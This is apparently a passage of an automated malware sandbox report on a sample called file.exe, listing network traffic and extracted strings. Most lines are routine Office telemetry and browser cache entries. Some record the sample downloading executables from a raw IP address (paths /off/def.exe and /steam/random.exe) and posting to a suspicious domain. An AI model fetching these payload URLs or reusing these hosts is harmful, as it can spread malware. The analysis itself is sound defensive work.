                Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
                Source: global trafficDNS traffic detected: DNS query: atten-supporse.biz
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
                Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
                Source: file.exe, 00000000.00000003.1827743180.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850545597.000000000117E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850545597.0000000001178000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1944171939.0000000001170000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1944171939.000000000117E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1943737468.0000000000EFB000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000003.1827515414.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                Source: file.exe, 00000000.00000003.1850545597.000000000117E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1944171939.000000000117E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: file.exe, 00000000.00000003.1827558227.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1666285292.00000000011C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chromecache_110.8.dr, chromecache_122.8.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: chromecache_131.8.drString found in binary or memory: http://schema.org/Organization
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: file.exe, 00000000.00000003.1594872193.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
